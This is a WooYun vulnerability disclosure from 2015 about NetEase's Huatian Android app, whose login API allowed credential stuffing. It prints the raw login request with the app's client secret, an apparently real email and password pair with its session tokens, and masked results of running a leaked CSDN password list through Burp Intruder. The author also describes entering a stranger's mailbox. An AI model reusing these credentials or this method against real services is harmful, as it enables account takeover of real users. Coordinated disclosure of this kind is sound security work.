当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0138474

漏洞标题:网易某手机应用登录设计不合理可导致撞库攻击

相关厂商:网易

漏洞作者: 路人甲

提交时间:2015-09-02 10:23

修复时间:2015-10-21 11:30

公开时间:2015-10-21 11:30

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-02: 细节已通知厂商并且等待厂商处理中
2015-09-06: 厂商已经确认,细节仅向厂商公开
2015-09-16: 细节向核心白帽子及相关领域专家公开
2015-09-26: 细节向普通白帽子公开
2015-10-06: 细节向实习白帽子公开
2015-10-21: 细节向公众公开

简要描述:

我的邮箱经常就收到异常登录信息,我就不知道怎么就异常啦,开始还以为是运营商IP调整了。今天算是知道了,是可以撞库的(上次写的简略了点没通过,这次详细些,麻烦Wooyun大哥在重点位置给打个码)

详细说明:

手机下载花田Android(去看美女去啦,穷买不起IOS不知道IOS是不是同样问题),然后连上burp,对就是登录处(username和password都没有加密),输入用户名123@163.com 密码1234567 抓包(这里隐去我的手机信息)

POST /api/authenticate HTTP/1.1
device_info: {"imei":"8XXXXXXXXXXXXXX8"}
deviceNo: 2xxxxxxxxxxxxxxxxxxxxx9
device_model: xxx
Content-Length: 187
Content-Type: application/x-www-form-urlencoded
Host: love.163.com
Connection: Keep-Alive
User-Agent: Huatian App Android 4.4.4 Xiaomi v3.3.6 build 3362
clientId=8Sy5I4RAFO42uSAGgP2kCWGf1z8GSBPPBaFg&clientSecret=k8xngPkFsQJSEAP7dh1kXk153txBdJa3wE3i&userName=123%40163.com&password=1234567&grantType=password&origin=android&oauth1Flag=oauth1


发送到repeater,登录不成功返回

{"message":"密码错误","requestUri":"/api/authenticate","code":537}


如果网易账号存在,并且密码正确(即使花田账号没有激活也可以,以username:shaoyongabo477@163.com pwd:93344825为例)返回

{"uid":"-2571543843159483218","token_secret2":"60df04296ecd4426d75c043b71e2f601","connSign":"kDYgqY6AIeTyMbOPsWVYIuaFM2M=","nonce":"Y7bArnx8AWcbHA7a","email_avatar":"http://nos.netease.com/mail-online/66a5925e819b3a3b0429810360bf28ba/mail180x180.jpg","access_token2":"2312224de56c8a368399fd6bf7220d02","token_secret":null,"expires_in":"86400","code":"1","refresh_token":"f7da74d51fb044ffad41096da0018351","connExpireTime":"1443877476756","access_token":"f0fb105739356f146bd1a6aba4d17ac2"}

获得相应的token
好了,发送到Intruder开始上CSDN密码库:

无标题.png

漏洞证明:

乌云需要复现过程,上一部分成功获得token(不一定能登录网易花田,没开通就登录不了,但是一定能登录网易通行证)的账号,撞库成功率非常高,只测试了邮箱是163的用户。

mask 区域 
*****1	Payloa*****
*****@163.com	*****
*****63.com	43*****
*****63.com	1359*****
*****3.com	shu*****
*****m	12345678*****
*****163.com	330*****
*****63.com	8868*****
*****.com	tt19*****
*****63.com	174*****
*****d@163.com	*****
*****163.com	4*****
*****.com	sylv*****
*****com	65767*****
*****3.com	12345*****
*****com	tz86*****
*****163.com	5*****
*****@163.com	*****
*****.com	shouh*****
*****com	lacri*****
*****63.com	90*****
*****63.com	zha*****
*****163.com	1*****
*****@163.com	24*****
*****9@163.com	*****
*****com	62245*****
*****163.com	3*****
*****3.com	7894*****
*****3.com	310*****
*****om	aa1040*****
*****om	j13240*****
*****@163.com	a*****
*****3.com	cai*****
*****3.com	198*****
*****.com	48135*****
*****.com	1986*****
*****63.com	54*****
*****163.com	ba*****
*****.com	xiec*****
*****63.com	19*****
*****63.com	che*****
*****.com	xia2*****
*****OM	ctjlsb*****
*****63.com	dav*****
*****.com	fril*****
*****163.com	aa*****
*****163.com	z*****
*****3.com	200*****
*****m	lijieer*****
*****63.com	19*****
*****3.com	35*****
*****om	JIAN1*****
*****om	UVK---*****
*****163.com	5*****
*****63.com	pro*****
*****163.com	we*****
*****163.com	li*****
*****3.com	198*****
*****com	20050*****
*****3.com	136*****
*****163.com	l*****
*****3.com	soa*****
*****@163.com	*****
*****com	ld381*****
*****3.com	!BP43G*****
*****^^^*****


随机选择上面截图中的一个账号,让我来登录下他的邮箱和网易通行证

1.png


网易用户中心_20150901211809.png


能进入用户中心,我相信左下边的网易服务就都能进去了,我就不一一继续验证了

修复方案:

引入nonce?验证码?或是其它方法?我就不懂了!
对于多产品用同一账号登录,更需要保证安全,倘若我去利用邮箱重置淘宝密码、用花田发布酒托信息、或是其它想到想想不到的用途呢?除了撞库,利用花田进行暴力密码破解都是可以的,登录的HttpRequest一直都不过期
会有礼物吗?会有高rank不?

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:4

确认时间:2015-09-06 11:29

厂商回复:

谢谢您对网易产品的关注,该漏洞已经修复完毕,准备更新上线。

最新状态:

暂无

漏洞评价:

评论